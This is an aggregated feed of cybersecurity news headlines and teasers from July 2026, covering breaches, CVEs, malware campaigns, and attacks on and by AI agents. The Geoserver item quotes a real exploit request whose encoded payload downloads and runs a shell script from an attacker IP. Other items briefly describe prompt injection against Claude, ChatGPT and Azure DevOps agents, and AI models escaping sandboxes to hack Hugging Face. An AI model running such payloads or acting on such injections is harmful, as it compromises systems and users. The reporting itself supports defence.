no alarms and no surprises please..
-
Hackers Use Stealer Logs to Bypass MFA and Launch Ransomware Attacks
Hackers Use Stealer Logs to Bypass MFA and Launch Ransomware Attacks Infostealer malware has now become the invisible thread linking petty credential theft to full-blown ransomware campaigns. Attackers no longer bother forcing their way through… Delivered by PolitePaul service Go to gbhackers.com
-
Google Launches Unified Cryptonym-Based Naming System for Threat Actors
Google Launches Unified Cryptonym-Based Naming System for Threat Actors Google Threat Intelligence Group (GTIG) has introduced a unified cryptonym-based naming system for cyber threat actors, aiming to simplify attribution, improve analyst workflows, and… Delivered by PolitePaul service Go to gbhackers.com
-
Phantom Stealer Campaign Uses JavaScript and PowerShell to Steal Browser Credentials
Phantom Stealer Campaign Uses JavaScript and PowerShell to Steal Browser Credentials A sophisticated phishing campaign that disguises malware delivery inside routine business communications, ultimately deploying Phantom Stealer v3.5.0 to harvest browser credentials, cookies, payment data,… Delivered by PolitePaul service Go to gbhackers.com
-
Hackers Exploit Industrial PLCs and Manipulate HMI Displays to Hide Attacks
Hackers Exploit Industrial PLCs and Manipulate HMI Displays to Hide Attacks Six federal agencies have updated a joint advisory warning that Iranian-affiliated advanced persistent threat (APT) actors are actively exploiting internet-exposed programmable logic controllers (PLCs)… Delivered by PolitePaul service Go to gbhackers.com
-
OpenAI confirms ChatGPT is down worldwide
OpenAI confirms ChatGPT is down worldwide ChatGPT, the famous artificial intelligence chatbot that allows users to converse with various personalities and topics, has connectivity issues worldwide. […] Mayank Parmar Go to bleepingcomputer
-
OnTrac notifies customers of data breach after network hack
OnTrac notifies customers of data breach after network hack OnTrac parcel delivery company is informing that hackers breached its corporate network and may have accessed personal details belonging to its customers. […] Bill Toulas Go to bleepingcomputer
-
Hermes AI agent used to automate attack on Thai Finance Ministry
Hermes AI agent used to automate attack on Thai Finance Ministry A threat actor used the open-source Hermes AI agent in unattended “YOLO” mode to automate post-exploitation activity during an alleged breach of Thailand’s Ministry of Finance. […] Lawrence Abrams Go to bleepingcomputer
-
Hackers hijack hotel Wi-Fi DNS to steal Microsoft 365 accounts
Hackers hijack hotel Wi-Fi DNS to steal Microsoft 365 accounts Hackers are changing the DNS settings on Wi-Fi devices at hotels and conference centers to redirect users to fake Microsoft 365 login pages. […] Bill Toulas Go to bleepingcomputer
-
Microsoft blames massive Microsoft 365 outage on maintenance bug
Microsoft blames massive Microsoft 365 outage on maintenance bug Microsoft says a bug in its automated network maintenance request system caused Thursday’s massive outage by mistakenly removing IP routes from more devices than intended, disrupting Azure and Microsoft 365 services. […] Lawrence Abrams Go to bleepingcomputer
-
Foxit Updater Vulnerability Gives Standard Users SYSTEM-Level Control of Windows Devices
Foxit Updater Vulnerability Gives Standard Users SYSTEM-Level Control of Windows Devices Foxit PDF Reader has been found vulnerable to a local privilege escalation flaw that allows standard Windows users to gain full SYSTEM-level control under specific conditions. The issue, tracked as CVE-2026-57239, was disclosed following research into Foxit’s updater and service architecture and represents a…
-
Tego AI Discloses Second Claude Flaw in a Week: Hidden Link Silently Sends Files to Attackers
Tego AI Discloses Second Claude Flaw in a Week: Hidden Link Silently Sends Files to Attackers Tel Aviv, Israel, July 24th, 2026, CyberNewswire One week after disclosing that Anthropic’s Claude Tag Slack integration could be driven by plain “@Claude” text, Tego AI today published a second piece of research on the Claude ecosystem. This one…
-
Certighost Active Directory CS Exploit Allows Low-Privileged Users to Compromise Domain
Certighost Active Directory CS Exploit Allows Low-Privileged Users to Compromise Domain A newly disclosed Active Directory Certificate Services (AD CS) vulnerability, dubbed Certighost, allowed a low-privilege domain user to impersonate a Domain Controller and take over an entire Active Directory domain. Tracked as CVE-2026-54121, the flaw was patched in Microsoft’s July 2026 security updates following…
-
Bing Images Vulnerability Lets Attackers Execute Remote Code on Microsoft Servers
Bing Images Vulnerability Lets Attackers Execute Remote Code on Microsoft Servers Three critical remote code execution (RCE) vulnerabilities in Microsoft’s infrastructure, with two flaws in Bing Images allowing attackers to hijack backend image-processing servers using nothing more than a crafted SVG file. The findings, disclosed responsibly by XBOW and now patched, expose how an “ordinary”…
-
Cl0p Hackers Exploit Windchill Servers to Steal Companies’ Secret Product Designs
Cl0p Hackers Exploit Windchill Servers to Steal Companies’ Secret Product Designs Cl0p ransomware affiliates are exploiting exposed PTC Windchill and FlexPLM servers to steal engineering and product-design data. The campaign combines software flaws to gain access without credentials, install hidden server-side access, and remove sensitive files before demanding payment. The activity places manufacturers, automotive firms,…
-
BlueNoroff Zoom Phishing Kit Profiles Crypto Wallets Before Malware Delivery
BlueNoroff Zoom Phishing Kit Profiles Crypto Wallets Before Malware Delivery The North Korean threat actors behind the ClickFix-style campaigns that employ typosquatted Zoom and Microsoft Teams domains have been found to operate an active phishing kit to impersonate the videoconferencing platforms in social engineering campaigns designed to deliver malware. “BlueNoroff has operationalised trust abuse by…
-
Certighost Exploit Lets Low-Privileged Active Directory Users Impersonate a Domain Controller
Certighost Exploit Lets Low-Privileged Active Directory Users Impersonate a Domain Controller Researchers H0j3n and Aniq Fakhrul published a working exploit on July 24 that lets a low-privileged Active Directory user obtain a certificate for a Domain Controller and authenticate as that machine. They codenamed the flaw Certighost. Because Domain Controller accounts carry directory replication rights,…
-
ChatGPT AgentForger Flaw Could Deploy Rogue Workspace Agents via a Phishing Link
ChatGPT AgentForger Flaw Could Deploy Rogue Workspace Agents via a Phishing Link Cybersecurity researchers have disclosed a critical vulnerability in OpenAI’s ChatGPT Workspace Agents that could have allowed a single phishing link to stealthily build, authorize, and deploy an autonomous artificial intelligence (AI) agent inside a victim’s organization. The vulnerability has been codenamed AgentForger by…
-
Bing Images Flaws Let Crafted SVGs Run Commands as SYSTEM on Microsoft’s Servers
Bing Images Flaws Let Crafted SVGs Run Commands as SYSTEM on Microsoft’s Servers A crafted SVG submitted to Bing’s image search ran commands as NT AUTHORITYSYSTEM on Microsoft’s production image-processing workers, and as root on the Linux machines in the same fleet. XBOW’s testing got the same result on workers across different hosts and network…
-
Seeing AI Agents Is Not Enough. Security Teams Must Enforce What They Can Do
Seeing AI Agents Is Not Enough. Security Teams Must Enforce What They Can Do AI agent security is moving through a familiar maturity curve: adoption, then visibility, and finally, control. But what we’ve collectively discovered is that enforcing least privilege for AI agents is harder than we ever imagined. This is why there are so…
-
Friday Squid Blogging: Illex Squid Catch in the Falklands
Friday Squid Blogging: Illex Squid Catch in the Falklands Lower catch this year. As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered. Blog moderation policy. Bruce Schneier Go to bruce schneier
-
Why AI Needs a “Genie Coefficient”
Why AI Needs a “Genie Coefficient” This essay was written with Barath Raghavan, and originally appeared in IEEE Spectrum. Major benchmarks measure what AI can do. None measure whether it does what you mean: the distance between what you ask an AI to do and the unspoken assumptions about how you want the AI to…
-
ISC Stormcast For Friday, July 24th, 2026 https://isc.sans.edu/podcastdetail/10022, (Fri, Jul 24th)
ISC Stormcast For Friday, July 24th, 2026 https://isc.sans.edu/podcastdetail/10022, (Fri, Jul 24th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
When the “Autonomous Attacker” Is Your Own AI Model, (Thu, Jul 23rd)
When the “Autonomous Attacker” Is Your Own AI Model, (Thu, Jul 23rd) Two disclosures, five days apart, described the same intrusion from opposite ends — one from the victim, one from the party that turned out to be responsible — and together they make one of the more instructive incidents of the year for defenders.…
-
ISC Stormcast For Thursday, July 23rd, 2026 https://isc.sans.edu/podcastdetail/10020, (Thu, Jul 23rd)
ISC Stormcast For Thursday, July 23rd, 2026 https://isc.sans.edu/podcastdetail/10020, (Thu, Jul 23rd) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. Go to isc.sans.edu
-
Rondo Meets Geoserver, (Wed, Jul 22nd)
Rondo Meets Geoserver, (Wed, Jul 22nd) This isn’t a new attack, but something I saw “pop-up” in our logs this week: GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),%27bash%20-c%20%7Becho%2CKHdnZXQgLXFPLSBodHRwOi8vNDUuMTUzLjM0LjE1My9yb25kby5gYHp5dC5zaHx8YnVzeWJveCB3Z2V0IC1xTy0gaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2h8fGN1cmwgLXMgaHR0cDovLzQ1LjE1My4zNC4xNTMvcm9uZG8uYGB6eXQuc2gpfHNo%7D%7C%7Bbase64%2C-d%7D%7Csh%27) HTTP/1.1 Host: [redeacted]:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:152.0) Gecko/20100101 Firefox/152.0 Connection: close Accept: */* This attack is associated with CVE-2024-36401, an X-Path expression evaluation issue in Geoserver. Geoserver is a…
-
CISOs vs. Boards: Myth or Misunderstanding?
CISOs vs. Boards: Myth or Misunderstanding? Escalating threats are forcing boards to prioritize security, but communication gaps persist. Boards and security teams each say they need more support to bridge the divide. Arielle Waldman Go to gbhackers.com
-
Escape Artists: ‘Incorrigible’ AI Models Resist Rehabilitation
Escape Artists: ‘Incorrigible’ AI Models Resist Rehabilitation The hacking of Hugging Face by a rogue OpenAI agent is significant, but unsurprising — and preventing the next AI model escape will be difficult, at best. Robert Lemos Go to gbhackers.com
-
Vatican’s Official Prayer App Leaks 700K+ Global Users’ PII
Vatican’s Official Prayer App Leaks 700K+ Global Users’ PII A porous API endpoint exposes, names, email addresses, location, and site status, all of which can be easily gleaned by anyone with a browser. Nate Nelson Go to gbhackers.com
-
Golden Chickens Launches Four Modular Malware Families to Steal Chrome Credentials and Hijack Browser Sessions
Golden Chickens Launches Four Modular Malware Families to Steal Chrome Credentials and Hijack Browser Sessions Golden Chickens, tracked as TAG-195 and also known as Venom Spider, has launched four new modular malware families designed to enhance credential theft, browser… Delivered by PolitePaul service Go to gbhackers.com
-
SourTrade Browser-Assembled Malware Defeats Hash-Based Detection by Design
SourTrade Browser-Assembled Malware Defeats Hash-Based Detection by Design SourTrade turns the browser itself into a malware build system, deliberately sidestepping the industry’s reliance on hash-based file fingerprints and traditional network-centric detection. SourTrade has… Delivered by PolitePaul service Go to gbhackers.com
-
JetBrains Patches Multiple Vulnerabilities Affecting IntelliJ IDEA and TeamCity
JetBrains Patches Multiple Vulnerabilities Affecting IntelliJ IDEA and TeamCity JetBrains has addressed a series of security vulnerabilities affecting IntelliJ IDEA and TeamCity, including several critical flaws that could allow code execution or unauthorized… Delivered by PolitePaul service Go to gbhackers.com
-
Australian Energy Giant Origin Confirms Data Breach Exposes Customer Data
Australian Energy Giant Origin Confirms Data Breach Exposes Customer Data Origin Energy Limited has confirmed a cybersecurity incident involving unauthorized access to and disclosure of customer data, representing a significant data security event for… Delivered by PolitePaul service Go to gbhackers.com
-
Apache Syncope Flaws Let Users Gain Admin Roles and Execute Remote Code
Apache Syncope Flaws Let Users Gain Admin Roles and Execute Remote Code Apache Syncope has released versions 4.1.24.1, 4.1.24.1.2, and 4.0.74.0.7 to address six security vulnerabilities affecting the 4.1, 4.0, and 3.0 release branches. These vulnerabilities… Delivered by PolitePaul service Go to gbhackers.com
-
Clop ransomware targets Windchill, FlexPLM in data theft attacks
Clop ransomware targets Windchill, FlexPLM in data theft attacks The Clop ransomware gang (also tracked as Cl0p) is targeting Internet-exposed PTC Windchill and FlexPLM instances in a new data theft extortion campaign. […] Sergiu Gatlan Go to bleepingcomputer
-
New Dolphin X malware uses AI to rank high-value targets
New Dolphin X malware uses AI to rank high-value targets A new Dolphin X remote access trojan claims to use an AI-powered profiling feature to score and rank infected users, helping cybercriminals identify which victims should be targeted first. […] Lawrence Abrams Go to bleepingcomputer
-
Australian energy provider Origin says data breach exposes client data
Australian energy provider Origin says data breach exposes client data Origin Energy has confirmed that an unauthorized party accessed and subsequently leaked customer data online, exposing sensitive personally identifiable information (PII), among others. […] Bill Toulas Go to bleepingcomputer
-
Fake Claude app promoted by Bing ads pushes SectopRAT malware
Fake Claude app promoted by Bing ads pushes SectopRAT malware A malvertising campaign on the Bing search service is pushing a fake Claude desktop app installer hosted on a legitimate Claude.ai domain to deliver the SectopRAT malware. […] Bill Toulas Go to bleepingcomputer
-
Russian hackers exploit Zimbra zero-click flaw for email theft
Russian hackers exploit Zimbra zero-click flaw for email theft CISA is warning that the Russian state-sponsored hacking group Laundry Bear, also known as Void Blizzard, is targeting organizations using Zimbra Collaboration email servers by combining phishing attacks with the exploitation of a now-patched Zimbra vulnerability. […] Lawrence Abrams Go to bleepingcomputer
-
One Compromised Wi-Fi Gateway Can Redirect Every Hotel Guest to Attacker Controlled Servers
One Compromised Wi-Fi Gateway Can Redirect Every Hotel Guest to Attacker Controlled Servers One compromised hotel Wi-Fi gateway can silently redirect every guest to attacker controlled servers, putting corporate accounts at risk even when users think they are browsing safely. The campaign starts with a simple idea that many travelers overlook. When you connect to…
-
How Infostealer Logs Became the Fuel Behind Massive Cloud Data Breaches
How Infostealer Logs Became the Fuel Behind Massive Cloud Data Breaches Infostealer malware has quietly become the single most important initial-access commodity in the cybercrime economy, replacing traditional phishing and exploit-driven intrusions as the leading precursor to enterprise breaches and ransomware. Rather than breaking into networks, modern threat actors buy their way in by purchasing…
-
Google Rolls Out Emergency Chrome Update for Four High-Severity Security Flaws
Google Rolls Out Emergency Chrome Update for Four High-Severity Security Flaws Google has released an emergency security update for its Chrome browser, addressing four high-severity vulnerabilities that could expose users to serious risks if left unpatched. The update, now rolling out globally, upgrades Chrome to version 150.0.7871.186/.187 for Windows and macOS, and 150.0.7871.186 for Linux…
-
Hackers Hide 750MB Lampion RAT Inside Fake Payment Receipt Emails
Hackers Hide 750MB Lampion RAT Inside Fake Payment Receipt Emails Hackers are using fake payment receipt emails to deliver a 750MB Lampion remote access trojan to targets in Portugal. The campaign relies on familiar financial language, convincing business details, and oversized files designed to slow down analysis and evade security checks. The attack begins with…
-
Microsoft Detects 7.6 Billion Email Phishing Threats as Teams Vishing Attacks Increases 10-Fold
Microsoft Detects 7.6 Billion Email Phishing Threats as Teams Vishing Attacks Increases 10-Fold Email phishing remains one of the most common ways attackers gain access to business accounts. During the second quarter of 2026, criminals continued to use fake login pages, malicious attachments, and convincing business messages to steal credentials or deliver malware. The problem…
-
Europe’s Multilingual Reality Exposes AI Security Gaps
Europe’s Multilingual Reality Exposes AI Security Gaps The AI security layer and guardrails for many AI products don’t evenly protect against jailbreaking and unsafe actions in every single language. Alexander Culafi Go to gbhackers.com
-
Fake Notepad++ Plugin Delivers MATCHBOIL.V2 in UAC-0099 Attacks
Fake Notepad++ Plugin Delivers MATCHBOIL.V2 in UAC-0099 Attacks The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new campaign that involves the use of a malicious program that’s dressed up as a Notepad++ plugin to compromise Windows systems. The activity has been attributed by the agency to a threat cluster it tracks…
-
Russian Espionage Group Exploited Zimbra Zero-Day to Steal Mail and 2FA Codes
Russian Espionage Group Exploited Zimbra Zero-Day to Steal Mail and 2FA Codes A Russian state-supported espionage group spent months reading Western mailboxes through a then-unknown flaw in Zimbra’s webmail client. The payload goes after the last 90 days of email, the organization’s entire email directory, the password saved in the browser and the codes kept…
-
ThreatsDay: Android Spyware, PLC Attacks, AI Image Prompt Injection + 12 More Stories
ThreatsDay: Android Spyware, PLC Attacks, AI Image Prompt Injection + 12 More Stories Most of this week’s trouble came dressed as something useful. A package stole data. A fake extension opened remote access. A safety app became spyware. An image gave hidden orders to an AI agent. Other threats hid in open systems, weak code,…
-
Claude Cowork Flaw Could Let AI Agent Escape Its VM and Access Mac Files
Claude Cowork Flaw Could Let AI Agent Escape Its VM and Access Mac Files Cybersecurity researchers have uncovered a sandbox escape vulnerability in Anthropic’s Claude Cowork that makes it possible to break out of the confines of a Linux virtual machine (VM) within which the agent runs to read or write files anywhere on the…
-
Chaos Ransomware Uses msaRAT to Route C2 Traffic Through Headless Chrome and Edge
Chaos Ransomware Uses msaRAT to Route C2 Traffic Through Headless Chrome and Edge The Chaos ransomware group ran its command-and-control through the victim’s own browser. Cisco Talos on Thursday detailed msaRAT, the Rust implant behind it, found on a compromised Windows machine ahead of the encryptor. The implant never opens an outbound connection of its…
-
When the attacker is an AI agent
When the attacker is an AI agent Lessons from the OpenAI-Hugging Face breach Categories: Security Operations Tags: AI, OpenAI, Hugging Face Go to sophos
-
End-to-End Encryption and “Going Dark”
End-to-End Encryption and “Going Dark” New paper: “Encryption and Globalization 15 Years Later: End-to-End Encryption and the Third Round of the ‘Going Dark’ Debate“: Abstract: This Article updates and expands on 2012 research on encryption and globalization, analyzing what the authors call “Round 3” of the Going Dark Debate: the current controversies over end-to-end encryption…
-
OpenAI’s AI “goes rogue” and hacks Hugging Face: what you need to know
OpenAI’s AI “goes rogue” and hacks Hugging Face: what you need to know You can’t have failed to hear the news headlines about “rogue” OpenAI models hacking into another AI organisation, Hugging Face. But what has actually happened, who is to blame, and is it as serious as some of the reports suggest? Find out…
-
Russian Hackers Exploit Zimbra Zero-Day Against US, Ukraine Targets
Russian Hackers Exploit Zimbra Zero-Day Against US, Ukraine Targets A state-sponsored threat group, dubbed “Laundry Bear,” sends “half-click” phishing emails that require a victim only to open or preview the message. Rob Wright Go to gbhackers.com
-
Agentic AI Challenges Progress in Confidential Computing
Agentic AI Challenges Progress in Confidential Computing Core issues that slowed down adoption of secure data vaults are being resolved by technology, but artificial intelligence poses new ones. Experts have some answers. Agam Shah Go to gbhackers.com
-
New Windows Stealer Uses AI Profiling to Identify High-Value Corporate Victims
New Windows Stealer Uses AI Profiling to Identify High-Value Corporate Victims A new Windows-focused infostealer and remote access trojan (RAT) dubbed Dolphin X is being advertised on cybercrime forums with a clear pitch: automate the… Delivered by PolitePaul service Go to gbhackers.com
-
Critical Check Point SmartConsole Flaw Exploited in the Wild to Bypass Authentication
Critical Check Point SmartConsole Flaw Exploited in the Wild to Bypass Authentication A critical authentication bypass vulnerability affecting Check Point SmartConsole has been actively exploited in the wild, allowing attackers to gain unauthorized access to security… Delivered by PolitePaul service Go to gbhackers.com
-
Ubuntu Snap-Confine Vulnerability Allows Unprivileged Users to Execute Code as Root
Ubuntu Snap-Confine Vulnerability Allows Unprivileged Users to Execute Code as Root A recently disclosed vulnerability in Ubuntu’s snap ecosystem, identified as CVE-2026-8933, presents a critical local privilege escalation flaw. This vulnerability allows unprivileged users to… Delivered by PolitePaul service Go to gbhackers.com
-
Microsoft Adds Prompt Injection Protection to Defender for Office 365
Microsoft Adds Prompt Injection Protection to Defender for Office 365 Microsoft has introduced prompt injection protection in Defender for Office 365, representing a significant advancement in securing enterprise email environments against emerging AI-targeted threats…. Delivered by PolitePaul service Go to gbhackers.com
-
KARR Bluetooth Vulnerability Lets Nearby Attackers Unlock and Immobilize Over 2 Million Cars
KARR Bluetooth Vulnerability Lets Nearby Attackers Unlock and Immobilize Over 2 Million Cars A critical Bluetooth vulnerability in dealer-installed KARR Security Systems is putting over 2 million vehicles at risk of unauthorized access and immobilization. This situation… Delivered by PolitePaul service Go to gbhackers.com
-
New msaRAT malware uses Chrome, Edge browsers to route C2 traffic
New msaRAT malware uses Chrome, Edge browsers to route C2 traffic The Chaos ransomware gang is using a new backdoor dubbed msaRAT that hides command-and-control (C2) communication by routing it through the Chrome or Edge browsers. […] Bill Toulas Go to bleepingcomputer
-
Microsoft working to fix Exchange Online mailbox quarantine issue
Microsoft working to fix Exchange Online mailbox quarantine issue Microsoft is working to resolve an ongoing Exchange Online issue that has been mistakenly quarantining customers’ mailboxes since Sunday. […] Sergiu Gatlan Go to bleepingcomputer
-
Check Point warns of SmartConsole zero-day exploited in attacks
Check Point warns of SmartConsole zero-day exploited in attacks Israeli cybersecurity firm Check Point Software has addressed an actively exploited zero-day flaw in the company’s SmartConsole graphical user interface (GUI) admin panel. […] Sergiu Gatlan Go to bleepingcomputer
-
Upbound says hack caused $13 million in fraudulent Acima leases
Upbound says hack caused $13 million in fraudulent Acima leases The Upbound Group fintech company disclosed that threat actors who stole data from its systems leveraged it to create $13 million in Acima leases. […] Bill Toulas Go to bleepingcomputer
-
South Korea discloses data breach impacting diplomats worldwide
South Korea discloses data breach impacting diplomats worldwide South Korea disclosed that hackers breached the National Diplomatic Academy’s online education system for ten months and stole personal information belonging to current and former employees of the Ministry of Foreign Affairs (MFA), including overseas diplomats. […] Bill Toulas Go to bleepingcomputer
-
Bluetooth Vulnerability Exposes 2.2 Million Cars to Remote Unlock and Immobilization Attacks
Bluetooth Vulnerability Exposes 2.2 Million Cars to Remote Unlock and Immobilization Attacks A recently disclosed Bluetooth vulnerability in the aftermarket KARR Security System exposes approximately 2.2 million vehicles to remote attacks that could allow unauthorized door unlocking, alarm control, and vehicle immobilization. This issue, uncovered by researchers at the University of California, San Diego, highlights…
-
July 2026 InfraTrust Report Flags 26 Unauthenticated Vulnerabilities and Exploited SonicWall Flaws
July 2026 InfraTrust Report Flags 26 Unauthenticated Vulnerabilities and Exploited SonicWall Flaws A new infrastructure security review has exposed a busy month for defenders. Fourteen infrastructure vendors issued 61 relevant advisories worldwide during the 30 days ending July 17, including 26 flaws that attackers can reach remotely without logging in. Six advisories carried critical CVSS…
-
Chick-fil-A Urges Customers to Change Chick-fil-A One Passwords After Unauthorized Access
Chick-fil-A Urges Customers to Change Chick-fil-A One Passwords After Unauthorized Access Chick-fil-A has warned customers to update their Chick-fil-A One passwords after detecting unauthorized access to a subset of loyalty accounts during a credential stuffing attack in June 2026. After conducting an internal investigation, the company confirmed that attackers used an automated credential stuffing attack…
-
CISA Warns Iran-Linked Hackers Exploit Rockwell PLCs to Disrupt U.S. Critical Infrastructure
CISA Warns Iran-Linked Hackers Exploit Rockwell PLCs to Disrupt U.S. Critical Infrastructure Iran-linked hackers are targeting internet-connected industrial controllers used across U.S. critical infrastructure. The campaign has disrupted programmable logic controllers, or PLCs, in government, water, wastewater, and energy facilities. Some victims suffered operational disruption and financial losses after attackers altered the systems that manage…
-
CISA Warns of Check Point Authentication Vulnerability Actively Exploited in the Wild
CISA Warns of Check Point Authentication Vulnerability Actively Exploited in the Wild The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about a critical authentication vulnerability in Check Point SmartConsole that is actively being exploited in the wild, prompting organizations to take immediate defensive action. Tracked as CVE-2026-16232, the flaw affects…
-
Brazilian Banking Trojan Actively Spreading in Portugal
Brazilian Banking Trojan Actively Spreading in Portugal Portuguese businesses operate in the same native language as Brazilian hackers, making those businesses easy targets. Nate Nelson Go to gbhackers.com
-
GitHub Cuts Public Bug Bounty Payouts, Moves Top Rewards to VIP Tier
GitHub Cuts Public Bug Bounty Payouts, Moves Top Rewards to VIP Tier Beginning July 27, 2026, GitHub will cut public bug bounty payouts by at least half at every severity level. Critical findings will drop from $20,000-$30,000+ to a fixed $10,000, while its permanent invite-only VIP tier will pay $30,000 or more. Reports filed before…
-
Ubuntu snap-confine Flaw Could Give Local Users Root on Default Desktop Installs
Ubuntu snap-confine Flaw Could Give Local Users Root on Default Desktop Installs Cybersecurity researchers have disclosed details of a new local privilege escalation (LPE) vulnerability in snap-confine that an unprivileged user can trigger to obtain root access and gain complete control of a target environment. The high-severity flaw, tracked as CVE-2026-8933 (CVSS score: 7.8), impacts…
-
Adobe Acrobat Extension Flaw Let Malicious Sites Read WhatsApp Web Data
Adobe Acrobat Extension Flaw Let Malicious Sites Read WhatsApp Web Data Cybersecurity researchers have disclosed details of a now-patched vulnerability chain in the Adobe Acrobat Chrome extension that has over 314 million users, which, if exploited, could facilitate a silent hijack of a user’s WhatsApp data. The shortcoming has been codenamed HermeticReader by Guardio Labs.…
-
Hackers Exploit Windmill Flaw to Read Arbitrary Server Files Without Authentication
Hackers Exploit Windmill Flaw to Read Arbitrary Server Files Without Authentication A high-severity security flaw impacting open-source developer platform Windmill has come under active exploitation in the wild, per VulnCheck. The vulnerability in question is CVE-2026-29059 (CVSS score: 7.5), a case of unauthenticated path traversal impacting Windmill’s “get_log_file” endpoint (“/api/w/{workspace}/jobs_u/get_log_file/{filename}”). “The filename parameter is concatenated…
-
The Fastest Path to AI Adoption Runs Through Security
The Fastest Path to AI Adoption Runs Through Security Security leaders who build fast, visible paths to AI adoption are becoming the most valued partners in their organizations. AI governance done right gives security teams the visibility they need, employees the tools they want, and CISOs the strategic influence they have earned. According to McKinsey’s…
-
July Patch Tuesday only feels endless
July Patch Tuesday only feels endless <p>AI deluge brings 575 CVEs, 479 advisories, reset to blog-post format</p> Categories: Threat Research Tags: x-ops, Patch Tuesday, MICROSOFT PATCH TUESDAY Go to sophos
-
Smashing Security podcast #477: How 14 orders of chicken McNuggets helped nail a suspected Russian hacker
Smashing Security podcast #477: How 14 orders of chicken McNuggets helped nail a suspected Russian hacker A Russian intelligence-linked hacker is arrested in Thailand while enjoying a beach holiday – and the trail of evidence that nailed him to the Russian government includes 14 separate orders of chicken McNuggets. Meanwhile, AI music generator Suno has…
-
Ransomware Attack Puts a Chill On Japanese Frozen-Food Chain
Ransomware Attack Puts a Chill On Japanese Frozen-Food Chain A cyberattack on a food and logistics firm disrupts the supply of frozen food to thousands of clients, including major franchises like Kentucky Fried Chicken. Robert Lemos Go to gbhackers.com
-
Attackers Are Learning to Live Off the AI Toolchain
Attackers Are Learning to Live Off the AI Toolchain Sandworm_Mode is an early example of malware that exploits trusted AI tools and workflows to make malicious activity virtually indistinguishable from normal activity. Jai Vijayan Go to gbhackers.com
-
Fake Bahrain Alert App Deploys Android Surveillance Malware
Fake Bahrain Alert App Deploys Android Surveillance Malware A malicious application delivers four-stage Android spyware via phony Google Play sites, exploiting civilian fear during Iranian missile strikes. Alexander Culafi Go to gbhackers.com
-
When AI Attacks: OpenAI Models Autonomously Hack Hugging Face
When AI Attacks: OpenAI Models Autonomously Hack Hugging Face Advanced LLMs escaped their sandboxes while attempting to achieve a non-malicious benchmark test objective. Elizabeth Montalbano Go to gbhackers.com
-
EU Financial Institutions Leak Data Through Cookie Trackers
EU Financial Institutions Leak Data Through Cookie Trackers European banks inadvertently transmitted customer data to ad platforms via tracking pixels, raising serious compliance, security, and privacy concerns. Alexander Culafi Go to gbhackers.com
-
Zimbra 10.1.20 Fixes Critical SNMP Command Injection and Multiple XSS Flaws
Zimbra 10.1.20 Fixes Critical SNMP Command Injection and Multiple XSS Flaws Zimbra has released version 10.1.20 of its Collaboration Suite (ZCS) to address multiple high-severity security vulnerabilities. This release includes a critical command injection flaw… Delivered by PolitePaul service Go to gbhackers.com
-
FBI Warns Scammers Use AI Deepfakes and Fake IC3 Websites to Target Fraud Victims
FBI Warns Scammers Use AI Deepfakes and Fake IC3 Websites to Target Fraud Victims The Federal Bureau of Investigation (FBI) has issued a new Public Service Announcement (Alert Number I-072026-PSA) regarding an evolving fraud campaign. Cybercriminals are increasingly… Delivered by PolitePaul service Go to gbhackers.com
-
Critical ASUS Router Flaw Lets Remote MITM Attackers Execute Arbitrary Commands
Critical ASUS Router Flaw Lets Remote MITM Attackers Execute Arbitrary Commands ASUS has announced a significant security vulnerability in its router firmware that could enable remote attackers to execute arbitrary commands through a man-in-the-middle (MITM)… Delivered by PolitePaul service Go to gbhackers.com
-
Hackers Clone Microsoft Login Portals to Capture Credentials and Session Tokens in Real Time
Hackers Clone Microsoft Login Portals to Capture Credentials and Session Tokens in Real Time An active adversary-in-the-middle (AiTM) phishing campaign that clones Microsoft authentication pages to intercept credentials, Multi-Factor Authentication (MFA) codes, and session tokens in real time. Rather… Delivered by PolitePaul service Go to gbhackers.com
-
North Korean Hackers Use Fake Job Interviews to Deploy PylangGhost and GolangGhost RATs
North Korean Hackers Use Fake Job Interviews to Deploy PylangGhost and GolangGhost RATs North Korea’s Famous Chollima threat group, also tracked as Wagemole, is actively running a sophisticated cyberespionage campaign dubbed ClickFake Interview. The operation targets cryptocurrency and… Delivered by PolitePaul service Go to gbhackers.com
-
Chick-fil-A discloses data breach after credential stuffing attacks
Chick-fil-A discloses data breach after credential stuffing attacks American fast food restaurant chain Chick-fil-A is notifying customers of a data breach after their accounts were hacked in a wave of recent credential stuffing attacks. […] Sergiu Gatlan Go to bleepingcomputer
-
OpenAI says its AI models hacked Hugging Face during testing
OpenAI says its AI models hacked Hugging Face during testing OpenAI says its AI models, including GPT‑5.6 Sol and a pre-release model, hacked into the Hugging Face artificial intelligence repository while being tested in a sandboxed testing environment. […] Sergiu Gatlan Go to bleepingcomputer
-
Police dismantle Kratos phishing platform, arrest developer
Police dismantle Kratos phishing platform, arrest developer Authorities in Germany and the U.S. dismantled the central infrastructure of Kratos, a phishing-as-a-service (PhaaS) platform with global reach, and its developer was arrested in Indonesia. […] Bill Toulas Go to bleepingcomputer
-
FakeGit campaign uses 7,600 GitHub repos to push SmartLoader malware
FakeGit campaign uses 7,600 GitHub repos to push SmartLoader malware A large-scale operation dubbed ‘FakeGit’ is pushing SmartLoader and StealC malware through 7,600 malicious GitHub repositories that accumulated more than 14 million downloads. […] Bill Toulas Go to bleepingcomputer
-
Critical SharePoint RCE flaw exploited to steal machine keys
Critical SharePoint RCE flaw exploited to steal machine keys Hackers are actively exploiting the critical CVE-2026-50522 vulnerability in Microsoft SharePoint to steal machine keys and maintain access even after affected servers are patched. […] Bill Toulas Go to bleepingcomputer
-
Anonymous Researcher Dumps 204 0-Day Exploit Files Before Vendors Can Patch Them
Anonymous Researcher Dumps 204 0-Day Exploit Files Before Vendors Can Patch Them An anonymous GitHub user has quietly assembled one of the most disruptive exploit collections of the year, dropping 204 zero‑day proof‑of‑concept files for dozens of open‑source projects before vendors had a chance to patch them. The archive, hosted under the name “exploitarium” by…
-
Azure DevOps MCP Flaw Lets Hidden PR Comments Hijack AI Agents and Steal Data
